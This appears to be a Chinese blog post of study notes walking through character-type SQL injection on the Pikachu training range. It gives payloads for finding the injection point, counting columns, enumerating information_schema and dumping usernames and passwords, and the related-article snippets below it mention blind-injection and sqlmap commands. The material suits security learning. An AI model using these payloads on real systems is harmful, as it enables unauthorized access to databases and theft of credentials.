pikachu之字符型sql注入详细过程

最新推荐文章于 2024-04-26 23:23:36 发布
最新推荐文章于 2024-04-26 23:23:36 发布
阅读量2.5k 收藏 15
点赞数 4
分类专栏: pikachu 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54024658/article/details/116993237
版权

基于pikachu的sql注入漏洞练习平台演示练习,作为个人学习笔记。

字符型sql注入

(1)确定注入点

在URL中,参数为name,当输入aa’时报错,当输入aa’‘时正常显示 ,可以判断注入点为name,漏洞类型为字符型。
输入aa’时浏览器返回信息
在这里插入图片描述输入aa’'时浏览器返回信息
在这里插入图片描述

(2)确定字段数

只有确定了字段数,才可以使用union这个关键词连接我们自己的查询语句。可以采用order by来确定字段数
输入kobe’ order by 1 # 通过更改数值,直到报错,判断字段数
在这里插入图片描述

(3)确定数据库和数据表

==kobe’ union select database(),2 # ==
可以看出数据库名称是pikachu
在这里插入图片描述

(4) 确定数据表

我们可以通过mySQL数据库自带的information_schema来知道,这个information_schema就是用来存储mySQL数据库所有信息的数据库。可以看到数据库中有一些数据表

其中有tables数据库,用来存放数据表信息
使用如下语句查询

	 select table_name,1 from information_schema.tables where table_schema='pikachu';

在这里插入图片描述
看到了users表,里面一定有可利用的数据信息

(5)获得数据表中的字段

select column_name,2 from information_schema.columns where table_name=‘users’ and table_schema=‘pikachu’;

在这里插入图片描述
看到了usernamepassword字段,就可以利用字段获取数据库里面的用户名和密码了
1’ union select user,password from users #
在这里插入图片描述

捭阖~
关注
  • 4
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
sql注入 pikachu post数字注入
08-12
SQL 注入 Pikachu Post 数字注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字注入方法,即使用 ...
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 1637
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 6462
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入点(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
SQL注入~数字注入&字符注入
最新发布
2401_82887816的博客
04-26 993
看/后面的字符,数字这些。
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8697
SQL注入原理-字符注入
pikachu sql注入 通关手册
tj2718647721的博客
08-07 685
手动方式:手工构造SQL语句进行注入点发现自动方式:采用自动扫描工具,自动进行注入点发现。
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2274
pikachu靶场通关之sql注入
一、pikachuSQL注入(1)
qq_55202378的博客
08-21 455
SQL注入 pikachu
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2484
Pikachu-----Sql Inject(SQL注入
pikachu-SQL注入
qq_43660551的博客
05-11 1320
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
一文了解pikachuSQL注入
allintao的博客
03-01 2638
本文章主要讲解关于pikachu注入方式。目录一、数字注入(post)二、字符注入(get)三、搜索注入四、xx注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
pikachu-sql注入
qq_74152953的博客
09-19 82
第一次做这种题,惯性思维以为要找flag,搞了很久,把一半数据都访问了一遍,后来才想明白找到username就行了。5.查询库名,版本信息(MySQL只有5.0以上才有自带information_schema库)2.万能密码试试(闭合或绕过' )等..)username一般在users表里。3.order by 判断字段数。(2不报错,3报错,字节数为2)8.查username。
pikachu靶场SQL注入.docx
09-13
字符注入是指在Web应用程序中,输入参数为字符串类注入字符注入的判断步骤如下: 1. 使用FireFox浏览器或BurpSuite工具来抓包,发送数据包到Repeater模块进行测试。 2. 测试注入sql语句闭合方式,特别...
sql注入之数字注入
08-02
SQL 注入之数字注入 SQL 注入之数字注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字注入的概念、原理、检测方法和...
pikachu.rar
03-05
用于搭建本地测试环境,是一个比较详细的漏洞平台,可用于搭建靶场、进行SQL注入测试,运用于Web安全攻防。
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4124
我们以数字(使用sqlmap)和整数(使用手工注入)举一个例子 数字注入(POST) 我们使用了sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库:pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
pikachu靶场--SQL inject--数字(post)/字符(get)/搜索/xx注入【4.1】~【4.4】
lmei1228的博客
06-10 763
当我们输入字符的时候,正常情况下,后台会给输入的字符+单引号,把他作为一个整个的字符串来处理,所以我们如果输入的是kobe or 1 = 1,传到后台的时候,or 1 = 1就不会起作用了,因此我们要构造闭合,输入kobe’ or 1 = 1#(#用--替换也可以,都是有着注释的意思,把后面的单引号注释掉),可以看到,它也能实现遍历。首先,打开我们的mysql数据库,use pikachu,然后对表“member”做查询,可以看到当参数为“1”和“1 or 1=1”时,所查询到的结果时大不相同的。
pikachu sql注入
08-11
引用和提到了一种叫做SQL注入的攻击方式。SQL注入是一种利用应用程序对用户输入的不当处理导致数据库执行非预期操作的漏洞。在引用和中提到的例子中,攻击者利用了应用程序中存在的漏洞,通过在用户输入中插入恶意的SQL代码,使数据库执行了恶意操作。具体来说,在这两个例子中,攻击者尝试获取pikachu数据库中的用户信息。 如果你对pikachu SQL注入感兴趣,我建议你参考引用中的文章。这篇文章详细介绍了字符SQL注入过程和防范措施,可以帮助你更好地理解和应对这种类的攻击。123 #### 引用[.reference_title] - *1* *2* [PiKachuSql (SQL注入)通关 2022](https://blog.csdn.net/av11566/article/details/124259545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *3* [pikachu-sql注入](https://blog.csdn.net/Resets_/article/details/129901110)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值